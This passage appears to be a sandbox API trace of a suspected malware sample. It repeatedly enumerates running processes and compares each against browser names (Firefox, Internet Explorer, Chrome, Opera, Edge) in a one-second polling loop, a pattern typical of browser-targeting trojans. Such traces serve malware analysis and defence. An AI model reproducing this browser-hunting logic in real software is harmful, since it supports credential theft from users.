pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.697] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0249.697] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.697] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.698] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.698] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.698] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.698] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0249.698] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.698] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0249.698] CloseHandle (hObject=0xe8) returned 1 [0249.699] Sleep (dwMilliseconds=0x3e8) [0250.701] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0250.703] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.703] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0250.703] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0250.703] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0250.703] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0250.703] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0250.703] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.704] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0250.704] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0250.704] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0250.704] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0250.704] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0250.704] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.704] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0250.704] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0250.704] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0250.704] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0250.704] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.704] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.705] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0250.705] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0250.705] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0250.705] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0250.705] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.705] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.706] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0250.706] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0250.706] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0250.706] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0250.706] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.706] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.706] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0250.706] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0250.706] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0250.706] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0250.706] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.706] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.707] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0250.707] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0250.707] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0250.707] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0250.707] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.707] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.707] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0250.707] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0250.707] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0250.707] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0250.707] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.707] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.708] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0250.708] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0250.708] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0250.708] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0250.708] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.708] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0250.708] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0250.708] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0250.708] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0250.708] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0250.709] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.709] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.709] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.709] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.709] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.709] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.709] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.709] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.710] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.710] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.710] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.711] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.711] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.711] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0250.712] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0250.712] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0250.712] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0250.712] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0250.712] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.712] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.712] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.712] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.713] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.713] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.713] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0250.714] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0250.714] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0250.714] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0250.714] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0250.714] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0250.714] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0250.714] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0250.714] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0250.714] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0250.714] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0250.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0250.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0250.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0250.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0250.715] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.715] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.715] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.715] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.715] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.715] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0250.715] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.715] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0250.716] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0250.716] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0250.716] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0250.716] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0250.716] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.716] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0250.717] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0250.717] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0250.717] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0250.717] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0250.717] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.717] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0250.717] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0250.717] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0250.717] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0250.717] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0250.717] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.717] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0250.718] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0250.718] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0250.718] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0250.718] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0250.718] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.718] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0250.718] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0250.718] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0250.718] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0250.718] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0250.719] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.719] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0250.719] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0250.719] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0250.719] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0250.719] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0250.719] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.719] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0250.720] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0250.720] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0250.720] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0250.720] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0250.720] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.720] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0250.720] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0250.720] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0250.720] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0250.720] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0250.720] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.720] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0250.721] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0250.721] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0250.721] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0250.721] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0250.721] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.721] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0250.721] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0250.721] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0250.721] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0250.721] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0250.722] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.722] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0250.722] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0250.722] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0250.722] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0250.722] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0250.722] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.722] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0250.723] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0250.723] lstrcmpiA 